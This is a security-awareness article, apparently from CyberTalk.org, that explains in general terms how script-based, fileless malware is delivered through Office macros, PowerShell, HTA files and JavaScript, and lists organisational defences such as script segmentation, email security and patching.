Malware attacks have surged across the past few years. According to one threat report, governments worldwide have witnessed a 1,885% increase in ransomware attacks alone. And bad actors are accelerating their technological sophistication and means of evading detection.

Cyber crime groups started to use advanced script-based malware programs around 2017. Since then, the prevalence of script-based malware programs has increased by more than 100%. At present, script-based malware attacks make up roughly 40% of all cyber attacks.

Scripts offer major advantages to cyber attackers. For example, scripts are easy to write. They’re also easy to execute. They’re trivial to obfuscate. And, they’re extremely polymorphic, making them difficult to stop using conventional, signature based tools.

How can an attacker execute malware through a script?

Scripts are typically simple programs written in Python, Jscript, Bash, PHP, Visual Basic, Ruby or Power Shell. And as with most technology, people use scripts to achieve both positive and negative outcomes. “Good guys” use scripts to make a computer behave in a desirable way; for example, adding a new legitimate, approved application. “Bad Guys” use this capability to start a malware download for the purpose of overwhelming systems.

A typical file-less script sees delivery via email, with a Word DOC that includes a malicious macro. This Macro executes a Visual Basic Script, that executes a hidden PowerShell task, which in turn reaches out to the internet to download a malware application. All of this occurs in RAM. There is no evidence of it being written to hard disk. Script-based attacks are designed to circumvent the conventional security solutions/anti-malware/antivirus programs on computers and devices.

Another issue that makes scripts that run malware difficult to identify is the fact that most organizations skip the logging of events from corporate computers. As a result, there is no evidence collected centrally and in real-time that a SEIM rule could trigger on. Some malware even looks for security tools on the PC and removes them or neuters them. Without an advanced endpoint AV/AM tool, you will have a hard time finding evidence of a script executing.

The other typical delivery method is via poser-ware. It looks like a legit PDF writer, or ZIP file tool, and it actually has scripts that will execute the download of malware.  Who knew that the IT Security Policy of not downloading unauthorized software really had a purpose?

Advanced Script-based malware represents a relatively new and moderately popular cyber attack technique. For attackers, a script functions as an efficient means of launching malware attacks and scripts provide initial access, enhanced evasion capabilities and they facilitate lateral movements post-infection.

As mentioned above, scripts execute during an in-memory operation, and do not involve writes to disks. For hackers, this is an advantage. Script-based malware is an ideal way to execute malicious attacks on systems without making any changes to the disk at all. This allows malware scripts to evade conventional security program detection mechanisms. Script-based malware even has the potential to slip through older and less capable endpoint security products and security gateways.

This is an issue. Here’s what to know…

How script-based malware works

Script-based malware attacks rely on device memory (rather than a disc) and are generally “fileless.” Attackers may use PowerShell to automate data exfiltration and infection processes, relying on pen testing security tools and frameworks like Metasploit or PowerSploit.

Discerning an origin point for a given script-based attack and pursuing effective analysis commonly proves challenging. Even after analysts manage to catch certain malware, new variants that rely on scripts can be created quickly. The newest endpoint tools will send an attachment off to be analyzed, executed in a “sand-box” (a facsimile of a user’s desktop) and if found to be dangerous, reach back to the user and neuter the file.

A deeper dive into script-based malware

So…how can an attacker execute malware through a script? To run a malware program via a script, attackers attach it to a program. Think Office documents and PDFs. Once attached, attackers send the program to victims.

Other means of executing malware through a script include use of HTML Applications (HTA) and JavaScript. HTAs are generally distributed through malicious attachments and extensions. An HTA can leverage user privileges to operate malicious scripts. At the same time, JavaScript codes typically get executed when cyber criminals lure users into visiting infected websites. An infected JavaScript code helps an attacker take advantage of system vulnerabilities and ultimately obtain device control.

Staying protected from script-based malware

Because script-based malware relies on memory, traditional static file detection is largely useless.

1. Segment employees/networks into groups.

Determine which employees need to run scripts as part of their role. Create a second group comprised of people who might need to run scripts, but where the probability of doing so is low. Create a third group consisting of those who do not need to run scripts. Once segmented, security teams need to enforce rules around operating scripts from read-only locations and specific devices. Disable or do not install unauthorized scripting tools or libraries.

2. Deploy strong organizational email security.

Advanced corporate email security tools can also offer prevention against this threats, provide notifications concerning exposed credentials, and more. Modernize your legacy Gateway-based solutions with API-based email security-as-a-service and protect your email services from the most sophisticated of attacks.

3. Protection for all devices. 

Hand-held devices and/or BYOD devices often fly-under-the-radar when it comes to cyber security. But your email security solution should enable you to protect corporate-owned and personally owned devices. In some cases, you may be able to offer protection to employees who use personal devices for work purposes with a corporate managed license and the agreement of the employee to give up a little space and control on their personal phone.

4. Ensure that systems are patched and updated.

Vulnerable and outdated systems are particularly susceptible to cyber-attacks initiated by computers inside the perimeter. These days, hackers can install malware via scripts, then scan internal networks to identify vulnerabilities and technical weaknesses. Ensure that you have effective vulnerability management programs and/or patch management programs in place and that critical and high-priority patches are installed within days of release.

In summary

So…how can an attacker execute malware through a script?

Scripts serve as both helpful tools and mechanisms through which hackers infiltrate organizations. Malicious scripts can contain both malware and viruses and are designed to evade conventional tools. You’ve read the details above. Ensure that your organization pursues the right approaches when it comes to avoiding malware-based scripts attacks, as they can lead to encryption blackmail/ransomware, data exfiltration, system interruptions or other serious damage.

For more insights into how attackers execute malware through scripts, see CyberTalk.org’s past malware coverage. Lastly, to receive cutting-edge cyber security news, exclusive interviews, expert analyses and security resources, please sign up for the CyberTalk.org newsletter.